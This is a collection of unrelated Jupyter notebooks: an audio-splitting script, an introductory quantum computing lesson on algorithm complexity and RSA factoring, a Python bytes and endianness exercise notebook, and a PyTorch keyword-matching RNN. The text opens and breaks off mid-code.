ax2.set_ylabel('Test Accuracy %') ax2.set_xlabel('# of Epcoh') ax2.legend() plt.suptitle(f'Training Accuracy and Test Accuracy for MLP({h_size}) on MNIST', y=1.01) plt.tight_layout() plt.show() # -
Feedforward Learning Rate Search/AMSGrad.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + from glob import glob mp3s = list(set(glob('*.mp3'))) len(mp3s) # + # # !cp ../*.mp3 . # - # !rm -rf clean-wav # !mkdir clean-wav # !cp ../mp.py . from pydub import AudioSegment from tqdm import tqdm import os os.path.split(mp3s[0]) def loop(mp3s): mp3s = mp3s[0] for f in tqdm(mp3s): try: replace = f.replace(' ', '-').replace('--', '_').replace('.mp3', '') os.system(f'ffmpeg -ss {60 * 5} -i "{f}" -f segment -segment_time {60 * 10} -c copy "{replace}-part-%03d.mp3"') globed = glob(f'{replace}-part*') for g in globed: audio = AudioSegment.from_mp3(g) audio.set_frame_rate(16000).set_channels(1).export(f"clean-wav/{g.replace('.mp3','.wav')}", format = 'wav') except Exception as e: print(f, e) from mp import multiprocessing multiprocessing(mp3s, loop, cores = 5, returned = False) # !rm *-part-*.mp3
data/language/malay/split.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Why quantum computing? # ## What is a computer? # # Seeing as you’ve managed to access this webpage, you should already know what a computer is. Today, computers take many forms: From laptops and phones to the systems controlling traffic lights. It seems computers can do anything! These systems can be very complex and specialised, but they all have one thing in common: A computer carries out a set of instructions on some input information to give us some new (output) information. # # The instructions we give computers need to be very specific and unambiguous. We call these sets of instructions _algorithms,_ and a lot of the research into computers is into the behaviour of different algorithms. In this course, we will only consider computers in their simplest form; no keyboards, mice, or screens- just information and algorithms. # # ![An artists rendering of basically all computers](images/why-qc/basically_all_computers.png) # + [markdown] formulas={"T": {"meaning": "This is the average time our search algorithm takes to run.", "type": "Locally defined variable"}, "exp": {"meaning": "This is the number of digits in our secret number. Because this is a superscript, this means we are doing 10 to the power of d.", "type": "Locally defined variable"}, "prop_to": {"meaning": "'Proportional to': Everything to the left of this symbol is <a href='https://en.wikipedia.org/wiki/Proportionality_(mathematics)'>proportional to</a> the things on the right.", "type": "Universal notation"}} gloss={"resources": {"text": "A resource is anything the algorithm needs to run. In computer science, this usually means either the time needed by the algorithm, or the space (e.g. 
computer memory).", "title": "Resources"}} # ## Classifying computer algorithms # # To understand the role of quantum computers amongst modern traditional computers, we first need to learn how we measure the perfomance of different algorithms. # # In computer science, we classify algorithms on how the [resources](gloss:resources) they use grow with the size of the input. We call this the algorithm’s _complexity_. For example, an algorithm that decides if a number is even only needs to look at the last digit in that number. In this case, the ‘input’ is a number, and the output is either ‘Even’ or ‘Odd’. We call this a _constant time_ algorithm, because the time the algorithm takes to complete doesn't depend on the size of the input number. It might take different computers different amounts of time to get this result, but that’s due to other factors and not the length of the input. # # ![The steps of an algorithm that works out if a number is even or odd](images/why-qc/odd-even-algo.svg) # # Let’s look at a different example. This time, the input is two numbers of equal length, and the problem is to add them together. In this case the output will be a new number. When adding two multi-digit numbers, a common algorithm you probably learnt at school starts with the rightmost digit from each number and adds them together. It then moves one digit to the left (carrying over a ‘1’ if the result was greater than 9) and repeats the process. The computer repeats this until there are no more digits to add, and the algorithm ends. # # ![Animation showing the steps of an addition algorithm](images/why-qc/adding-algo.svg) # # <!-- ::: q-block.exercise --> # # ### How complex is addition? # # <!-- ::: q-quiz(goal="intro-why-qc-0") --> # # <!-- ::: .question --> # # The time this addition algorithm takes to complete... # # <!-- ::: --> # # <!-- ::: .option(correct) --> # # 1. ...grows linearly (proportionally) with the length of the input number (linear time). 
# # <!-- ::: --> # # <!-- ::: .option --> # # 2. ...is not affected by the length of the input number (constant time) # # <!-- ::: --> # # <!-- ::: .option --> # # 3. ...grows with the square of the length of the input number (quadratic time) # # <!-- ::: --> # # <!-- ::: --> # # <!-- ::: --> # # Again, different computers will execute this algorithm at different speeds; a laptop can perform addition millions of times faster than a human can. But whether you can do a million operations a second or just one, the rate of growth will be the same. # # ![graph of constant and linear running times vs input sizes for different running times](images/why-qc/graph-linear-constant.svg) # # Here is one final example that is very particularly interesting to us. Let’s say I have a secret number (such as a PIN), and the problem is to guess it. In this case, the size of the problem is the length of the number. # # Let’s say the only way we can check if our answer is correct is by punching it into a keypad. Since we have no information about what that number might be, the best algorithm to find this secret number uses a ‘brute-force’ method, which means it does nothing clever and simply tries every possible number. # # How long would this take? Now, in theory we could get lucky and guess the answer in one go, but this is very unlikely. On average, we’d have to try around half the possible inputs, so the running time of our algorithm is proportional to the number of possible combinations. The question now becomes: How does the number of possible combinations grow with the length of the secret number? # # ![Animation showing the steps of a brute-force search algorithm](images/why-qc/search-algo.svg) # # Each digit we add to our secret number multiplies the number of possible combinations by 10. E.g. a secret number with 1 digit has 10 possible values (0, 1, 2, 3, 4, 5, 6, 7, 8 & 9), and a secret number with 2 digits has 100 possible values. 
Assuming the time taken to guess each password takes the same amount of time (regardless of the length), we can represent this mathematically like so: # # $$ \cssId{T}{T} \cssId{prop_to}{\propto} 10^\cssId{exp}{d}$$ # # You will notice the number of digits (d) is the exponent in this equation, and as such we say this is an _exponential time_ algorithm, and that the running time grows exponentially with the length of the input. # # ![graph of constant, linear and exponential running times vs input sizes for different running times](images/why-qc/graph-all.svg) # + [markdown] gloss={"intractable": {"text": "An intractable problem is one which can be solved in theory, but requires too many resources in practice.", "title": "Intractable"}} # ## Why do we measure algorithms like this? # # Different computers have different strengths; certain operations might be faster on one computer than another. By studying growth vs input size, we can ignore device-specific details and actually measure the _algorithm_, instead of the specific combination of algorithm and computer. Importantly, knowing how an algorithm scales with input size also tells us whether the algorithm will grow manageably or not. # # Let’s think about the linear-time addition algorithm we saw above. If we could add two 10-digit numbers in one second, due to the linear rate of growth, we should be able to add two 20-digit numbers in two seconds. Each extra 10 digits should add roughly one more second to our computation time. # # To contrast, imagine you could find a 10-digit PIN in 1 second using the exponential-time search algorithm above. This means your computer is fast enough to try \~5,000,000,000 combinations per second. We would expect this computer using this algorithm to take roughly 5,000,000,000 seconds (\~150 years) to find a 20-digit PIN. Adding another 10 digits increases this to around 150,000,000,000 years (\~120x the age of the universe). 
Exponential-time algorithms with even a modestly sized input (in this case \~30 digits) can become not just difficult, but literally impossible to carry out. # # While this PIN-finding problem is an artificial example we intended to be as simple as possible, there are many real problems in computer science for which we only have inefficient algorithms. Despite the impressive speed of today’s computers, these [intractable](gloss:intractable) problems can be too difficult for even the largest supercomputers. # # But if we can find algorithms that grow more efficiently, these intractable problems may suddenly become manageable, even with relatively slow or unreliable computers. This is where quantum computing comes in. # # ## How can quantum computing help? # # So far, we have thought of algorithms in a very abstract way, but the computers that execute these algorithms must exist in the real world. Whether these computers are high-powered microchips, or humans with pens and paper, all computers are ultimately governed by the laws of physics, and the operations they can perform limit the algorithms we can create. # # Physics is an attempt to work out the set of rules everything in the universe follows. Around the early 20th century, through delicate experiments in laboratories, physicists saw strange behaviours which their current physics could not explain. This meant the rules weren’t quite accurate, so they developed the more complete ‘quantum’ physics, which describes this behaviour very well. # # Physicists created quantum physics to explain behaviour they'd never seen before, and computer scientists found they could (in theory) exploit this newly discovered behaviour to create more efficient algorithms. As a result, there are certain problems that we believe are intractable for conventional computers, but are manageable for a ‘quantum’ computer that can exploit this behaviour. One such problem is _integer factorisation_. 
# # # Say we have an integer we'll call '$x$'. A factorizing algorithm finds the integers $p$ and $q$ such that $p×q = x$. This is sometimes easy; you can tell at a glance that $2000 = 2 × 1000$, but if $x$ is the product of two large prime numbers, this problem becomes very difficult. When we talk about integer factorisation, we’re going to assume the most difficult (worst-case) scenario. In the code cell below, we’re assigning a 250-digit number to the variable <code>x</code>: # - x = 2140324650240744961264423072839333563008614715144755017797754920881418023447140136643345519095804679610992851872470914587687396261921557363047454770520805119056493106687691590019759405693457452230589325976697471681738069364894699871578494975937497937 # + [markdown] gloss={"coreyears": {"text": "Conventional computer chips are often made from processors called <a href=\"https://en.wikipedia.org/wiki/Multi-core_processor\">\"cores\"</a>. A <i>core-year</i> is the equivalent of using one of these cores continuously for a year. For reference, a modern laptops have around 2-4 cores. The meaning of this number depends on how powerful the core is, but this should give you a rough idea of the computing power involved.", "title": "Core Year"}} # In 2020, researchers factorised this number using a classical supercomputer and ~2700 [core-years](gloss:coreyears) of processing power. This was a large effort, and record breaking at the time of writing. We can verify their results in the code cell below (fortunately, we do have efficient algorithms for multiplication!): # + p = 64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367 q = 33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711 p*q == x # Evaluates to 'True' # + [markdown] gloss={"RSA": {"text": "RSA numbers are numbers taken from the RSA factoring challenge. 
These numbers are intentionally chosen to be difficult to factor.<p>'RSA' are the initials of three of the people that invented the protocol that uses these large numbers to encrypt information.", "title": "RSA Number"}} # The output shown is the value of the last line of the cell. In this case we can see that <code>p*q == x</code> evaluates to <code>True</code>. Although not mathematically proven, we're pretty sure there’s no efficient algorithm for factoring such numbers on traditional computers. In fact, much of the internet’s encryption relies on the assumption that this problem is intractable, and that factoring a 617-digit [RSA](gloss:RSA) number is impossible. In contrast, we know of efficient factoring algorithms for quantum computers that, once we have big enough quantum computers, we estimate could factorise these numbers in under a day. # + [markdown] gloss={"noise": {"text": "Noise is useless information that's difficult to distinguish from useful information. For example, it's hard to hear someone talking to you if there are lots of other people talking loudly nearby.", "title": "Noise"}, "qiskit": {"text": "Qiskit is a software development kit for working with quantum computers.", "title": "Qiskit"}, "qubits": {"text": "A 'qubit' is a 'quantum bit'. We will study these later in this course.", "title": "Qubit"}, "transistor": {"text": "A transistor is an electronic device. They can be used to switch electric currents on and off, and can be used to build a computer processor.", "title": "Transistor"}} # ## Where are we now? # # We now know that quantum computers can carry out more efficient algorithms, but the quantum computers we have today are too small and unstable to give an advantage over traditional computers. # # At a very simple level, there are two factors that limit the size of problems our quantum computers can solve. The first is the amount of data they can store and work on, which we usually measure in [_qubits_](gloss:qubits). 
If we don’t have enough qubits, we simply can’t store and operate on problems above a certain size. The second is the error rate of our quantum computer; since we only see quantum behaviour in delicate laboratory experiments, creating quantum computers is a delicate process. The quantum computers we have right now are noisy, which means they often get things wrong and introduce ‘[noise](gloss:noise)’ into our results. Too much noise and our results will be nonsense! # # At the moment, the quantum computers we have are experimental. They're limited by qubit counts and error rates, so the biggest problems they can currently solve are still easily manageable for conventional computers. # # At some point in the future, this will change. We will reach ‘quantum advantage’, in which it will actually make economic sense to solve a problem using a quantum computer over a conventional computer. How do we know? _Because we measure algorithms by their rate of growth!_ We know that, as long as quantum computers keep developing steadily, they will eventually take over classical computers. # # ![comparison of (projected) classical vs quantum factoring abilities over time](images/why-qc/q-vs-c.svg) # # The estimate for factoring a 617-digit RSA number in under a day assumed ~20 million noisy qubits. At the time of writing, IBM currently has a 65-qubit quantum computer, and is aiming to create a system with over 1000 qubits by 2023. There are other algorithms that we believe will give us a quantum advantage long before this milestone, but it may still seem we are a long way off. # # We should remind ourselves of where conventional computers came from. Below is a picture of the first [transistor](gloss:transistor), created in 1947. Transistors are the building blocks of modern computer processors. 
# # ![comparison of (projected) classical vs quantum factoring abilities over time](images/why-qc/first-transistor.jpg) # Image credit: Federal employee <a href="https://clintonwhitehouse4.archives.gov/Initiatives/Millennium/capsule/mayo.html">Link</a>, <a href="https://commons.wikimedia.org/w/index.php?curid=554340">Public Domain</a>. # # 70 years later, our modern computer chips can contain billions of transistors. # # In the rest of this course, we will explore the quantum effects that allow us to create more efficient algorithms. By the end of this course you will be able to use the software package, [Qiskit](gloss:qiskit), to program a quantum computer to run one of these algorithms. # - # <!-- ::: q-block.exercise --> # # ### Quick quiz # # <!-- ::: q-quiz(goal="intro-why-qc-1") --> # # <!-- ::: .question --> # # Quantum computers will eventually... # # <!-- ::: --> # # <!-- ::: .option(correct) --> # # 1. ...do computations that are too difficult for conventional computers. # # <!-- ::: --> # # <!-- ::: .option --> # # 2. ...replace conventional computers. # # <!-- ::: --> # # <!-- ::: .option --> # # 3. ...increase the speed of conventional computers. # # <!-- ::: --> # # <!-- ::: --> # # <!-- ::: -->
notebooks/intro/why-quantum-computing.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + ############## PLEASE RUN THIS CELL FIRST! ################### # import everything and define a test runner function from importlib import reload from helper import run import helper # - # ### This is a Jupyter Notebook # You can write Python code and it will execute. You can write the typical 'hello world' program like this: # # ```python # print('hello world') # ``` # # You can execute by pressing shift-enter. Try it! You can also click the Run button in the toolbar. # print('hello world') # ### Exercise 1 # You can do a lot more than just print "hello world" # # This is a fully functioning Python3 interpreter so you can write functions and objects like in the next box. # # Try printing the 21st Fibonacci number below instead of the 11th. You can add caching if you want to practice coding in Python. # # + # Exercise 1 def fib(n): if n in (0,1): return 1 else: return fib(n-1) + fib(n-2) print(fib(20)) # CHANGE THIS LINE # - # ### A few things you should remember in Python 3 # # Strings and bytes are now different # # ```python # s = 'hello world' # b = b'hello world' # ``` # # These may look the same but the 'b' prefix means that the variable `b` is bytes whereas the variable `s` is a string. Basically, the on-disk characters on the system are bytes and the actual symbols in unicode are strings. A good explanation of the difference is [here](http://www.diveintopython3.net/strings.html). 
# s = 'hello world' b = b'hello world' print(s==b) # False # You convert from string to bytes this way: hello_world_bytes = s.encode('ascii') print(hello_world_bytes == b) # True # You convert from bytes to string this way: hello_world_string = b.decode('ascii') print(hello_world_string == s) # True # ### Imports # # You already have unit tests that are written for you. # Your task is to make them pass. # We can import various modules to make our experience using Jupyter more pleasant. # This way, making everything work will be a lot easier. # # this is how you import an entire module import helper # this is how you import a particular function, class or constant from helper import little_endian_to_int # used in the next exercise some_long_variable_name = 'something' # ### Exercise 2 # #### Jupyter Tips # # The two most useful commands are tab and shift-tab # # Tab lets you tab-complete. Try pressing tab after the `some` below. This will complete to the variable name that's there from the last cell. # # Shift-Tab gives you a function/method signature. Try pressing shift-tab after the `little_endian_to_int` below. That's also there from the last cell. # # + # Exercise 2 some_long_variable_name # press *tab* here little_endian_to_int() # press shift-tab here # - # ### Exercise 3 # # # Open [helper.py](/edit/session0/helper.py) and implement the `bytes_to_str` and `str_to_bytes` functions. Once you're done editing, run the cell below. # # # #### Make [this test](/edit/session0/helper.py) pass: `helper.py:HelperTest:test_bytes` # + # Exercise 3 reload(helper) run(helper.HelperTest('test_bytes')) # - # ### Getting Help # # If you can't get this, there's a [complete directory](/tree/session0/complete) that has the [helper.py file](/edit/session0/complete/helper.py) and the [session0.ipynb file](/notebooks/session0/complete/session0.ipynb) which you can use to get the answers. 
# # ### Useful Python 3 Idioms # # You can reverse a list by using `[::-1]`: # # ```python # a = [1, 2, 3, 4, 5] # print(a[::-1]) # [5, 4, 3, 2, 1] # ``` # # Also works on both strings and bytes: # # ```python # s = 'hello world' # print(s[::-1]) # 'dlrow olleh' # b = b'hello world' # print(b[::-1]) # b'dlrow olleh' # ``` # # Indexing bytes will get you the numerical value: # # ```python # print(b'&'[0]) # 38 since & is charcter #38 # ``` # # You can do the reverse by using bytes: # # ```python # print(bytes([38])) # b'&' # ``` # a = [1, 2, 3, 4, 5] print(a[::-1]) # [5, 4, 3, 2, 1] s = 'hello world' print(s[::-1]) # 'dlrow olleh' b = b'hello world' print(b[::-1]) # b'dlrow olleh' print(b'&'[0]) # 38 since & charcter #38 print(bytes([38])) # b'&' # ### Python Tricks # # Here is how we convert binary to/from hex: # print(b'hello world'.hex()) print(bytes.fromhex('68656c6c6f20776f726c64')) # ### Exercise 4 # Reverse this hex dump: `b010a49c82b4bc84cc1dfd6e09b2b8114d016041efaf591eca88959e327dd29a` # # Hint: you'll want to turn this into binary data, reverse and turn it into hex again # # + # Exercise 4 h = 'b010a49c82b4bc84cc1dfd6e09b2b8114d016041efaf591eca88959e327dd29a' # convert to binary (bytes.fromhex) hb = bytes.fromhex(h) # reverse ([::-1]) hr = hb[::-1] # convert to hex() print(hr.hex()) # print the result # - # ### Modular Arithmetic # # If you don't remember Modular Arithmetic, it's this function on python # # ```python # 39 % 12 # ``` # # The result is 3 because that is the remainder after division (39 / 12 == 3 + 3/12). # # Some people like to call it "wrap-around" math. If it helps, think of modular arithmetic like a clock: # # ![clock](http://latex.artofproblemsolving.com/f/4/d/f4daa2601de14fddf3d8441e16cc322a25e85354.png) # # Think of taking the modulo as asking the question "what hour will it be 39 hours from now?" 
#
# If you're still confused, please take a look at [this](https://www.khanacademy.org/computing/computer-science/cryptography/modarithmetic/a/what-is-modular-arithmetic) article.
#

print(39 % 12)

# ### Exercise 5
#
# Find the modulo 19 of these numbers:
#
# * 99
# * \\(456 \cdot 444\\)
# * \\(9^{77}\\)
#
# (note python uses ** to do exponentiation)
#

# +
# Exercise 5
prime = 19
print(99 % prime)
print((456 * 444) % prime)
print(9**77 % prime)
# -

# ### Converting from bytes to int and back
#
# Converting from bytes to integer requires learning about Big and Little Endian encoding. Essentially any number greater than 255 can be encoded in two ways, with the "Big End" going first or the "Little End" going first.
#
# Normal human reading is from the "Big End". For example 123 is read as 100 + 20 + 3. Some computer systems encode integers with the "Little End" first.
#
# A number like 500 is encoded this way in Big Endian:
#
# 0x01f4 (256 + 244)
#
# But this way in Little Endian:
#
# 0xf401 (244 + 256)
#
# In Python we can convert an integer to big or little endian using a built-in method:
#
# ```python
# n = 1234567890
# big_endian = n.to_bytes(4, 'big')  # b'\x49\x96\x02\xd2'
# little_endian = n.to_bytes(4, 'little')  # b'\xd2\x02\x96\x49'
# ```
#
# We can also convert from bytes to an integer this way:
#
# ```python
# big_endian = b'\x49\x96\x02\xd2'
# n = int.from_bytes(big_endian, 'big')  # 1234567890
# little_endian = b'\xd2\x02\x96\x49'
# n = int.from_bytes(little_endian, 'little')  # 1234567890
# ```
#

n = 1234567890
big_endian = n.to_bytes(4, 'big')
little_endian = n.to_bytes(4, 'little')
print(big_endian.hex())
print(little_endian.hex())
print(int.from_bytes(big_endian, 'big'))
print(int.from_bytes(little_endian, 'little'))

# ### Exercise 6
# Convert the following:
#
# * 8675309 to 8 bytes in big endian
# * interpret ```b'\x11\x22\x33\x44\x55'``` as a little endian integer
#

# +
# Exercise 6
n = 8675309
little_endian = b'\x11\x22\x33\x44\x55'

# 8675309 encoded as 8 big-endian bytes.
print(n.to_bytes(8, "big"))
# BUG FIX: the exercise asks for the *integer* interpretation of the
# little-endian bytes; the original printed little_endian.hex(), which is
# just the hex dump, not the decoded integer.
print(int.from_bytes(little_endian, 'little'))
# -

# ### Exercise 7
#
#
# We'll want to convert from little-endian bytes to an integer often, so write a function that will do this.
#
#
# #### Make [this test](/edit/session0/helper.py) pass: `helper.py:HelperTest:test_little_endian_to_int`

# +
# Exercise 7
# NOTE(review): `reload` and `run` are assumed to be in scope from an earlier
# cell (importlib.reload and the course's test runner) — confirm.
reload(helper)
run(helper.HelperTest('test_little_endian_to_int'))
# -

# ### Exercise 8
#
#
# Similarly, we'll want to do the inverse operation, so write a function that will convert an integer to little-endian bytes given the number and the number of bytes it should take up.
#
#
# #### Make [this test](/edit/session0/helper.py) pass: `helper.py:HelperTest:test_int_to_little_endian`

# +
# Exercise 8
reload(helper)
run(helper.HelperTest('test_int_to_little_endian'))
# -
session0/session0.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
import random
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
from torch.nn.utils.rnn import pad_sequence
import torch.nn.functional as F
import re
import pandas as pd
import time
import math
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib import style
import pickle
# Moved up so all imports live in one place; the duplicate trailing
# `import math` that followed it in the original cell was removed.
from tqdm import tqdm

# Run on GPU when one is available.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(torch.cuda.is_available())
# -

# # Introduction
# This notebook contains a model I made from scratch to evaluate if a keyword (short sentence or a word) and a sentence (a long sentence or a paragraph) is a match. I used two encoder RNNs, one for the keyword and one for the description, plus an Attention-like mechanism, but not as complicated as Attention. (see the model part for more detail)

# # Define classes and functions

# ### Tool classes

style.use("ggplot")
plt.switch_backend('agg')


def showPlot(points):
    """Plot a sequence of values (e.g. averaged losses) as a line chart."""
    # %matplotlib inline
    plt.plot(points)


# +
def asMinutes(s):
    """Format a duration of `s` seconds as 'Xm Ys'."""
    m = math.floor(s / 60)
    s -= m * 60
    return '%dm %ds' % (m, s)


def timeSince(since, percent):
    """Return 'elapsed (- estimated remaining)' for a run started at `since`.

    `percent` is the fraction of work completed so far (must be > 0);
    remaining time is extrapolated as elapsed / percent - elapsed.
    """
    now = time.time()
    s = now - since
    es = s / (percent)
    rs = es - s
    return '%s (- %s)' % (asMinutes(s), asMinutes(rs))
# -

# Getting a list of words from a sentence. This function is typically useful for ecommerce sites that use Chinese as their main language. Note that one can modify this part according to her needs.
def get_word_list(s1): regEx = re.compile('([\u4e00-\u9fa5]|[^a-zA-Z0-9_-]+)') res = re.compile(r"([\u4e00-\u9fa5])") p1 = regEx.split(str(s1).lower()) str1_list = [] for stri in p1: if res.split(stri) == None: str1_list.append(stri) else: ret = res.split(stri) for ch in ret: str1_list.append(ch) list_word1 = [w for w in str1_list if len(w) != 0] return list_word1 # ### Dataset classes # I defined my own data class to store data in pandas class Vocabulary: def __init__(self, freq_threshold): self.itos = {0: "<PAD>", 1: "<SOS>", 2: "<EOS>", 3: "<UNK>"} self.stoi = {"<PAD>": 0, "<SOS>": 1, "<EOS>": 2, "<UNK>": 3} self.freq_threshold = freq_threshold def __len__(self): return len(self.itos) @staticmethod def tokenizer_ch(text): return get_word_list(text) def build_vocabulary(self, sentence_list): frequencies = {} idx = 4 for sentence in sentence_list: for word in self.tokenizer_ch(sentence): if word not in frequencies: frequencies[word] = 1 else: frequencies[word] += 1 if frequencies[word] == self.freq_threshold: self.stoi[word] = idx self.itos[idx] = word idx += 1 def numericalize(self, text): tokenized_text = self.tokenizer_ch(text) return [ self.stoi[token] if token in self.stoi else self.stoi["<UNK>"] for token in tokenized_text ] class MyDataset(Dataset): def __init__(self, root_dir, captions_file, freq_threshold=5,vocab = None): self.root_dir = root_dir self.df = pd.read_csv(captions_file) # Get key, des, score columns self.key = self.df["pre_search_word"] self.desc = self.df["name"] self.score = self.df["y"] # Initialize vocabulary and build vocab if vocab == None: self.vocab = Vocabulary(freq_threshold) self.vocab.build_vocabulary(self.desc.tolist()+self.key.tolist()) else: self.vocab = vocab def __len__(self): return len(self.df) def __getitem__(self, index): key = self.key[index] desc = self.desc[index] score = self.score[index] numericalized_key = [self.vocab.stoi["<SOS>"]] numericalized_key += self.vocab.numericalize(key) 
numericalized_key.append(self.vocab.stoi["<EOS>"]) numericalized_desc = [self.vocab.stoi["<SOS>"]] numericalized_desc += self.vocab.numericalize(desc) numericalized_desc.append(self.vocab.stoi["<EOS>"]) return torch.tensor(score), torch.tensor(numericalized_key), torch.tensor(numericalized_desc) class MyCollate: def __init__(self, pad_idx): self.pad_idx = pad_idx def __call__(self, batch): scores = [item[0] for item in batch] scores = torch.tensor(scores) keys = [item[1] for item in batch] keys = pad_sequence(keys, batch_first=False, padding_value=self.pad_idx) descs = [item[2] for item in batch] descs = pad_sequence(descs, batch_first=False, padding_value=self.pad_idx) return scores, keys, descs def get_loader( root_folder, file_name, batch_size=32, num_workers=8, shuffle=False, pin_memory=True, dataset = None, start_from = 0, vocab = None): if dataset == None: dataset = MyDataset(root_folder, file_name,vocab = vocab) if start_from != 0: dataset.df = dataset.df[start_from:].reset_index(drop=True) dataset.key = dataset.key[start_from:].reset_index(drop=True) dataset.desc = dataset.desc[start_from:].reset_index(drop=True) dataset.score = dataset.score[start_from:].reset_index(drop=True) pad_idx = dataset.vocab.stoi["<PAD>"] loader = DataLoader( dataset=dataset, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory, collate_fn=MyCollate(pad_idx=pad_idx), ) return loader, dataset def get_or_load_data(batch_size = 1,from_csv_file = False,save = False,csv_file = "train.csv",start_from = 0, vocab = None): if from_csv_file == False: with open('dataloader.pkl', 'rb') as input: dataset = pickle.load(input) data_start = pickle.load(input) train_loader, dataset = get_loader("", csv_file ,batch_size = batch_size,dataset = dataset,start_from = start_from-data_start) else: train_loader, dataset = get_loader("", csv_file ,batch_size = batch_size,vocab = vocab) if save == True: with open('dataloader.pkl', 'wb') as output: pickle.dump(dataset, 
output, pickle.HIGHEST_PROTOCOL) total_batches = len(train_loader) vocab_size = len(dataset.vocab) return train_loader, dataset, total_batches, vocab_size # ### Model # The idea is that: we want our model to mimic how we evaluate the relation, which is : first we remember the keyword and we see through the sentence to see if there is the pattern of our keyword in the sentence. # # The training steps: # 1. We feed our keyword into the EncoderK to encode the keyword to a vector. # 2. We concate the encoded keyword to every word of the sentence to make sure our model remember the keyword when reading the sentence (one can also use the Attention mechanism, but since our keyword are usually very short here, I don't think that is necessary) # 3. We feed the concated sentence to the EncoderD to make prediction. class EncoderK(nn.Module): def __init__(self, vocab_size, hidden_size, num_layers, p): super(EncoderK, self).__init__() self.hidden_size = hidden_size self.num_layers = num_layers self.embedding = nn.Embedding(vocab_size, hidden_size) self.rnn = nn.LSTM(hidden_size, hidden_size, num_layers, bidirectional=True,dropout = p) def forward(self, x): # x: (seq_length, N) where N is batch size embedding = self.embedding(x) # embedding shape: (seq_length, N, embedding_size) encodedK, (hidden, cell) = self.rnn(embedding) #encoder_states: (seq_len, N, 2* hidden_size) #hidden: (num_layers * 2, N, hidden_size) #cell: (num_layers * 2, N, hidden_size) return encodedK[-1,:,:], hidden, cell class EncoderD(nn.Module): def __init__(self, vocab_size, hidden_size, num_layers, p): super(EncoderD, self).__init__() self.embedding = nn.Embedding(vocab_size, hidden_size) self.rnn = nn.LSTM(hidden_size*3, hidden_size, num_layers, bidirectional=True,dropout = p) self.ff = nn.Linear(hidden_size*2,2) self.dropout = nn.Dropout(p) def forward(self, x, encodedK,hidden, cell): # x: (seq_length, N) where N is batch size #encodedK: (1, N, 2* hidden_size) #hidden: (num_layers * 2, N, hidden_size) 
#cell: (num_layers * 2, N, hidden_size) embedding = self.dropout(self.embedding(x)) # embedding shape: (seq_length, N, hidden_size) encodedK = encodedK.repeat(embedding.shape[0],1,1) embedding = torch.cat((embedding, encodedK),2) out, _ = self.rnn(embedding) # outputs shape: (seq_length, N, hidden_size) out = self.dropout(out[-1,:,:]) out = self.ff(out) return out def get_encoders(new = False,model_num = 1): plot_losses = [] start_from = 0 if new == True: encoderK1 = EncoderK(vocab_size,hidden_size,num_layers,p).to(device) encoderD1 = EncoderD(vocab_size,hidden_size,num_layers,p).to(device) else: with open('model'+str(model_num)+'.pkl', 'rb') as input: encoderK1 = pickle.load(input) encoderD1 = pickle.load(input) plot_losses = pickle.load(input) start_from = pickle.load(input) return encoderK1, encoderD1, plot_losses, start_from # ### Train function def train_model(num_epochs = 1,plot_every = 500,print_every = 5000,save_every = 50000,start_from = 0): encoderD1.train() encoderK1.train() for ep in range(num_epochs): if num_epochs != 1: print("epoch: ",ep+1) print("=================================================================================================================") global batch_count batch_count = 0 plot_loss_total = 0 print_loss_total = 0 start = time.time() for idx, (scores, keys, descs) in enumerate(train_loader): encoderK_optimizer.zero_grad() encoderD_optimizer.zero_grad() keys = keys.to(device) scores = scores.to(device) descs = descs.to(device) encodedK, hidden, cell = encoderK1(keys) prediction = encoderD1(descs,encodedK,hidden,cell) loss = criteria(prediction, scores) loss.backward() encoderK_optimizer.step() encoderD_optimizer.step() plot_loss_total += loss print_loss_total += loss batch_count+=1 if batch_count % plot_every == 0: plot_loss_avg = plot_loss_total / plot_every plot_losses.append(plot_loss_avg) plot_loss_total = 0 if batch_count % print_every == 0: print('%s (%d %d%%) %.4f' % (timeSince(start, (batch_count) / 
(total_batches)),batch_count+start_from, (batch_count+start_from) / (total_batches+start_from) * 100, print_loss_total/print_every)) print_loss_total = 0 if batch_count % save_every == 0: num = (batch_count//save_every)%2+1 with open('model'+str(num)+'.pkl', 'wb') as output: pickle.dump(encoderK1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(encoderD1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(plot_losses, output, pickle.HIGHEST_PROTOCOL) pickle.dump(batch_count+start_from, output, pickle.HIGHEST_PROTOCOL) print("Saved model"+str(num)+".\nBatch count: ",batch_count) with open('model'+str(num%2+1)+'.pkl', 'wb') as output: pickle.dump(encoderK1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(encoderD1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(plot_losses, output, pickle.HIGHEST_PROTOCOL) pickle.dump(0, output, pickle.HIGHEST_PROTOCOL) print("Saved model"+str(num)+". End of epoch ",ep) # ### Evaluate function def evaluate(test_loader,encoderK1,encoderD1,threshold = 0.5,sample_size = 10000,print_index = False): with torch.no_grad(): encoderK1.eval() encoderD1.eval() right_num = 0 total_num = 0 total_loss = 0.0 pbar = tqdm(total = sample_size,position=0, leave=True) for idx, (scores, keys, descs) in enumerate(test_loader): keys = keys.to(device) scores = scores.to(device) descs = descs.to(device) encodedK, hidden, cell = encoderK1(keys) prediction = encoderD1(descs,encodedK,hidden,cell) loss = criteria(prediction, scores) predic_prob = F.log_softmax(prediction) if predic_prob[0][scores.item()].item() > 